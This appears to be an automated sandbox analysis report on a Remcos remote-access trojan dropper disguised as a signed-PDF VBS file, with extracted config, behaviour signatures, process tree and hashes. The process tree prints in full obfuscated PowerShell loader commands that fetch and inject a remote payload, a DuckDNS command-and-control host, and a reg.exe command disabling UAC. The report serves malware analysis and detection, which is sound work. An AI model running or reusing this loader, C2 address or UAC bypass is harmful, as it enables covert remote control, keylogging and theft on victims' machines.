Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29-11-2024 09:16
Static task
static1
Behavioral task
behavioral1
Sample
30180908_signedpdf.vbs
Resource
win7-20240903-en
General
-
Target
30180908_signedpdf.vbs
-
Size
33KB
-
MD5
33788adfb67a0e0bf5a5fe58cb9c5617
-
SHA1
a62c45afa541fdcccc5c97c432c78ce55b0a7a5b
-
SHA256
609aaa35ee7b0582cb3e1e4e9f76d647c98377dac62eca602bf318578b61576f
-
SHA512
9da759eba3eee9ed6d1b804ed8d26f1f59831d49543e393b6adf462343d98dbefabc0314c673b31a4c52857e0d975edbb8304c0e1ee7a375fd71f446ab655a50
-
SSDEEP
768:WuEasaYzR+s1z3NkQpyhZ6d4nl3pVVCStrppuAP:zEasd+a3iQpy/V3/UStF3P
Malware Config
Extracted
remcos
RemoteHost
8766e34g8.duckdns.org:3782
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-93TSMD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 64 IoCs
Processes:
WScript.exepowershell.exemsiexec.exeflow pid Process 3 2256 WScript.exe 7 2424 powershell.exe 9 2424 powershell.exe 11 1816 msiexec.exe 13 1816 msiexec.exe 15 1816 msiexec.exe 17 1816 msiexec.exe 18 1816 msiexec.exe 20 1816 msiexec.exe 21 1816 msiexec.exe 22 1816 msiexec.exe 23 1816 msiexec.exe 24 1816 msiexec.exe 25 1816 msiexec.exe 26 1816 msiexec.exe 27 1816 msiexec.exe 28 1816 msiexec.exe 29 1816 msiexec.exe 30 1816 msiexec.exe 31 1816 msiexec.exe 32 1816 msiexec.exe 33 1816 msiexec.exe 34 1816 msiexec.exe 35 1816 msiexec.exe 36 1816 msiexec.exe 37 1816 msiexec.exe 38 1816 msiexec.exe 39 1816 msiexec.exe 40 1816 msiexec.exe 41 1816 msiexec.exe 50 1816 msiexec.exe 51 1816 msiexec.exe 52 1816 msiexec.exe 53 1816 msiexec.exe 54 1816 msiexec.exe 55 1816 msiexec.exe 56 1816 msiexec.exe 57 1816 msiexec.exe 58 1816 msiexec.exe 59 1816 msiexec.exe 60 1816 msiexec.exe 61 1816 msiexec.exe 62 1816 msiexec.exe 63 1816 msiexec.exe 64 1816 msiexec.exe 65 1816 msiexec.exe 66 1816 msiexec.exe 67 1816 msiexec.exe 68 1816 msiexec.exe 69 1816 msiexec.exe 70 1816 msiexec.exe 71 1816 msiexec.exe 72 1816 msiexec.exe 73 1816 msiexec.exe 74 1816 msiexec.exe 75 1816 msiexec.exe 76 1816 msiexec.exe 77 1816 msiexec.exe 78 1816 msiexec.exe 80 1816 msiexec.exe 81 1816 msiexec.exe 82 1816 msiexec.exe 83 1816 msiexec.exe 84 1816 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Processes:
powershell.exepowershell.exepid Process 2424 powershell.exe 2560 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 1816 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 2560 powershell.exe 1816 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.execmd.exereg.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid Process 2424 powershell.exe 2560 powershell.exe 2560 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid Process 2560 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 2560 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
msiexec.exepid Process 1816 msiexec.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
WScript.exepowershell.exemsiexec.execmd.exedescription pid Process procid_target PID 2256 wrote to memory of 2424 2256 WScript.exe 31 PID 2256 wrote to memory of 2424 2256 WScript.exe 31 PID 2256 wrote to memory of 2424 2256 WScript.exe 31 PID 2560 wrote to memory of 1816 2560 powershell.exe 36 PID 2560 wrote to memory of 1816 2560 powershell.exe 36 PID 2560 wrote to memory of 1816 2560 powershell.exe 36 PID 2560 wrote to memory of 1816 2560 powershell.exe 36 PID 2560 wrote to memory of 1816 2560 powershell.exe 36 PID 2560 wrote to memory of 1816 2560 powershell.exe 36 PID 2560 wrote to memory of 1816 2560 powershell.exe 36 PID 2560 wrote to memory of 1816 2560 powershell.exe 36 PID 1816 wrote to memory of 2016 1816 msiexec.exe 38 PID 1816 wrote to memory of 2016 1816 msiexec.exe 38 PID 1816 wrote to memory of 2016 1816 msiexec.exe 38 PID 1816 wrote to memory of 2016 1816 msiexec.exe 38 PID 2016 wrote to memory of 2144 2016 cmd.exe 40 PID 2016 wrote to memory of 2144 2016 cmd.exe 40 PID 2016 wrote to memory of 2144 2016 cmd.exe 40 PID 2016 wrote to memory of 2144 2016 cmd.exe 40
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30180908_signedpdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"2⤵
- Blocklisted process makes network request
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Amtsraadet='Folklorens';;$Bellyaching='Belnningssystem';;$Prereview='Professionally';;$Ostensiv='Vesiculiferous';;$Syvkanterne=$host.Name;function Refunderer($Bovlam){If ($Syvkanterne) {$Erhvervsgeografi=4} for ($Motocrossene=$Erhvervsgeografi;;$Motocrossene+=5){if(!$Bovlam[$Motocrossene]) { break };$Fordummelsen+=$Bovlam[$Motocrossene];$Chirm='Scrawm'}$Fordummelsen}function Eksercitsens($logicism){ .($Artiskokhjerte) ($logicism)}$Ruidoso=Refunderer 'Biksnunb eOpbetZai..InstW';$Ruidoso+=Refunderer 'FiliE,rytbW dmCFir LTissIKilne Quan HalT';$Ersar=Refunderer 'NoncMBuf.oA,eazI pei .telfiltlCorraIntr/';$Allocatur=Refunderer 'hypeTAntil AfbsJera1,uck2';$Passerens='Kirc[E tenAynaEUnultPane. L.tSGl be OvarB.ceVUnquIAab CN tiECo tpMicrO B.nIafh NSykltOvermLilla M lNu puaSamfGWassEMeniR D.t]Pr s:Tard:SporST,stEH emcA teu A,brNotoiTaentPat YAlloP erR CaloRe eT UnpoD stCy.miOrefaL onm=Isch$TapeADri lElytLFizzO ejCHalvAA rit lamuVer R';$Ersar+=Refunderer 'Snou5.alo.Insi0Dedu bur (CirkWFe.tiBecrn PaldyachoPj ewAktis.lip rbiNB oaTHo e Repr1Hino0Sejl.Svul0frar; Hjt Min WHyp,iHidfnMari6topp4Skid;,yst Ha,xSlan6Excr4 Ura;chan T,terR fev N g:mngd1Nykr3Spi 1Tau...pir0Dags) ain TautGDampe unccKul.kMegaoRe,u/ Sju2kyss0Lock1Hemi0Poli0De a1Tema0Abo 1 Fid LuncF PhoiPy irGesje Spef,ndoo ilbx ver/Sund1Sta 3 Syv1Dise.Pa h0';$Sarongers=Refunderer 'Wri U OmbSBalleclavrSy a-EtatABibeg uleBelen Efft';$manometeret=Refunderer 'AcuahVenlt R gtAfhnpbphesH.nd: Rc /Boha/AfledF larBusfigiftvPulveAftn.Undeg eloArbeoPiblg Noml.urre ene.AmfecKrydo Skam fbr/An.uuMenuccal ?NeomePhonxRestpTabloT turPlayt ffr=Un edLacto marwMispnO palKa loAffaa WhedHypn&CaliiDoc,dFore=Mona1DemojByldDParezP.laZprot3SeksH tetJAsseHUm rVOp erR,tevTricr EquGVensU A ajEryt9Slve0p,ecjNeurWTjur7 FaikTw.nx A hCgymnSSpleqTe.rlBiopdSt.fv .er0HankJSponeUndeJ';$Justitsministerium=Refunderer 'Orga>';$Artiskokhjerte=Refunderer 'LongiP,ace ,asX';$Skotjsarbejders='Concomitants';$Bogging='\Superspecialists.Won';Eksercitsens (Refunderer 'V la$Unp.GDepeL A,rOUndeBNittAL gnLTran: ndmDekoLArmoK HalENonat DepAAfsknIn.vD An,=Inte$ .emeG,arn,edmvUhyg:Sur,AUharP ,efP Vitd OmfATrilTKrigAKu.s+Peri$.astbBr loA eugA rbgU geIPyranExciG');Eksercitsens (Refunderer 'Sche$ima g Pull ortounm BFjsia GamlPyn : DisITwisnDekadUdgaFUntaL da.YBolltPa.cTde ke ChetDard= na $ bunmSti aAntanEtagOBa dmPerieU esT ForE algrBo eESnaptIrid.ResksNavnpRa tl AryI PubtOpma(phan$P.daJ RemuSlassPh sTWrotIAfriTSe isSem MAflsiVulvNRebsISlodSS miTDispe To.RIndii SplU Fram Fil)');Eksercitsens (Refunderer $Passerens);$manometeret=$Indflyttet[0];$karrooers=(Refunderer 'hal.$antigUnbrllivsoFrucBFrisaForrlanst:SelvuM siS Nobl,ammISy vN onoGDisp=BrobNDobbEFamoW nyb-TjenoLaryBClooJOvereMethC PhatNota MotisAlb ypeloS Feft ageOverMTyng. am$,itarAgeiUTopoI Metd HypoLseks LeuO');Eksercitsens ($karrooers);Eksercitsens (Refunderer 'Nuse$,akkUDalaso fil SuriI ran jergK id.P.tiHWe,geSam a ,ykdVaageCli,rBarbsSvej[Supr$ oenSAssaaHabirDunboCoupnberegposte LagrD spsNonp] all=vend$.esgEStaprTuvasMiteaRewar');$Variationerne=Refunderer 'L ve$,onaUGodbsdekol igaiAf anHellgReat. br.D Nedo Pl wOutfnTr,olGan oVoksa,guadSpirFIn fi.dvil KvaeR.to(Hvs $pan.mRenhaOut n S voContmEndeeFa,stUn,oeDeltr,odle FattDypp,Konf$ForsAHa daRosen Uvod Ad ePithmFle,aP otn Spae nidrResheov r)';$Aandemanere=$mlketand;Eksercitsens (Refunderer 'Pala$ JaiG Su.l,tdlOLegeb EleaProxLb nd: ,loFTr,pADeselLodgkSnape ctoJLophA RelgQuintyamaeAfbenOrv.sSlag=Udvi( UdkTStereSsonsUda Tm,rs-RecepBus.AGre TEkskhS mm Blaf$Hatta FirA Gu,n,inddRa,tEerytmVersA papn Cowe asrArbeeReso)');while (!$Falkejagtens) {Eksercitsens (Refunderer 'Gr,d$Rec gFer lInaloInteb vrda AnslFyr :S,mmNSpasoPartbM.tto EnjdS opiUnpue M tsVej =Thir$ TilSS.utpTerpnR ovdBe liPr vnPicega tosKa,cfT,faeBe ijMa clInscsbe n2Hypn4C nt7') ;Eksercitsens $Variationerne;Eksercitsens (Refunderer 'ProwsBerdTIr,eaSpdbR uacTIn.v-UdensSyn.LGrunE leeLo,ap For E is4');Eksercitsens (Refunderer 'Int $DesiG PatlFoulo ommbUdflaKeraLHack:Pa,aFochlA ympLFilrKDr ee .agJ .ksANon,g KletArtie teaNProgs Non=P pi(C.rct Di eAdsksCou T and-Altip eiALiketTordh og ver$Afara harATat,NBraidSamaE endMOxygAWatsnKnokEShinRAlmieGela)') ;Eksercitsens (Refunderer 'H nd$Enfug tenlRea,OHandBdkmaathe LNonn:WhimMDumpa rkanAnemDMindiAngr1jouk6finn8Emac=Sy.h$ NemGTyveL graoSnudbSinta MeslMile:SyphAEye.LSkimTBaryEProcRHairN erve Ev rPhoreArbeSRdkl+Conv+ Pop%Prag$Not,i elunSoleD laffSna l ediyHje.tUdryTStraEForttKn r.PhotcCakaoSterUNon nsildt') ;$manometeret=$Indflyttet[$Mandi168]}$Foranalysers=297459;$Opmarchomraaderne=30173;Eksercitsens (Refunderer ' vik$Tve.G Eg lRegnOOpbebBenhAaborL Hy.: Bl,eRhi f asstDobbe ManrKnivkHarnR udsisannG,ikeSBorotNonrIChardTaleE iber komnLichESchi2,all7,eev Pron=Bibe AlleGAktieForeTFals-GentC EpioFlauN enmT TaleVgten BegtS,bh bro $TrreaSkina Ka.N,orpD rsmE Fr mUdmnA truN OveeUnfrREdite');Eksercitsens (Refunderer ' lfr$Arbag D elUndeoSkotbTh ma WailBars:ContfUkral ndeiTe et GultKlineForerPasegIlluuExc,lSkmtdPlet Ndbr=Disi rel[StrmS apy CresExpltUliveSpelmHasl.RetiCRe poAtmon AdrvBegiePilorOvert Cou] ekl:Ove :BrooFUndir.exfoRentmSolsBRegeaInt,sUmble Ufo6Kapi4 ottS S itBesirtangiBoo,nOmdag Unc(Hiru$AarsE .etfLandtCivie Star SmlkCo rrph li FasgR.spsTiskt emi maad M reStabrManin FrueAdfr2Blu,7I,dv)');Eksercitsens (Refunderer 'Tvek$Tetrg harlUdvaoOverB.kolaBoykl ost:BjrgbSulfAKareDSigtEtilln.ythi AssCbe khUdreETepiRRaak Spec=Frem Aut[Ud.eSto cyTreesCyliTCec.eLngemVerm.SortTTeemeHummxcatttS be.ForbePreinS.olC Ba.O I ldIncoIKin nEcidGTup.]Husl: ndt:.mugaSalmsSa.iCProlIRedaiPrep.C rogDisteScabTMic,sNgletHaarrFiggiStabnPiceGMund(Folk$QualFBrugLH odiDebotKntrTSendeJo dr boggfuldUAandL,engdCato)');Eksercitsens (Refunderer 'Unde$ atgFel.l Parod.ssbHarea ittlLand:ScalP Ba ETuckTProbR BigOBr nN exe.ubelUdklLTrigaAcu,=Orni$SeisbHjeraE,brD orueE ytnSkipiOutrCUlemHP,nsE Conr Fr .SapoSUdt uTillbDaghS Sh.TPingROeveISaa,NOmbyGMeth(Unme$Agg,fMerlOP.etR Shoa TypN.ncoaDrmmLSle YFingsDataebantrIntesB aa,Morf$UnoeoCottPN,dsm SemADegeRLeawCKu uHLintOSupemJewhrFrotAov rA SerdApteeSkorRFettNRmn eFaci)');Eksercitsens $Petronella;"1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2144
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5b928f2cb9d443ba6195b254ef0daf96a
SHA1397258f674df984cfee0434be39cfd4480c2b861
SHA256a9d69fe9cf2936b8c3bfad0a3acbae4704b7c84b269a4c76100519b0dbeb9ac6
SHA512fba8a429ae1719f5e830c9b84db114a6214dd9d1a4ca66a79cea451ef243c66ee45ba7facb27142ba8cdf539036c9c8eaaba18dc82d4cc4d007af3581dc54577
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58884feb849ae2af3e6a881ef6d4baf8d
SHA1461a9a58dcc77d2c78ea2e1ff3847b6b8badc104
SHA2564f2005cd637ed11408dbe2ed015de9a34555bb50325be4ea96d482d9f263676c
SHA5127d6509df40171abd886789f4f4496620a448a90f78f4f45ec609289e4e630f62c4d33d4c4dabbc399ca7d3684cbd8cbb4635a7246d9ca4f289ba109a9fbb5ce0
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M4ZLX5NK0Q5WK1SMH6B9.temp
Filesize7KB
MD5d57596122db9f627577e929b5bce4dfe
SHA1d7a213a9ec90d0648f0635d7a50ba22419957f65
SHA256d7f36081d1275473d3ea09ea1611113b53b7085d6f76b879b1e64e0b5cad287c
SHA512f65420ff0d2a04d96bb896661603c2341608ef9375dc0305c59f688ed174b6b8b874e220402f121cb4fd6eef2848b22e741be59d867791feb4e365ea11fb8f04
-
Filesize
426KB
MD58a3cfa45f3daf3318ee35fbc24637ccd
SHA1a4a2f7a664f7839ede5e3a38cd303c50ac4db90d
SHA25613345dbc875ba768cb21aadf3b3127c0cd7b9278f1460f8bac7b2c382ac6bc6d
SHA512a35d23894c58a3613fee2426974a2626ecdc410d254055a3a704f03ed54f64162bde5be672c4f706039f810e125610fb62ed941df6f4f4fa51ba9da12299e111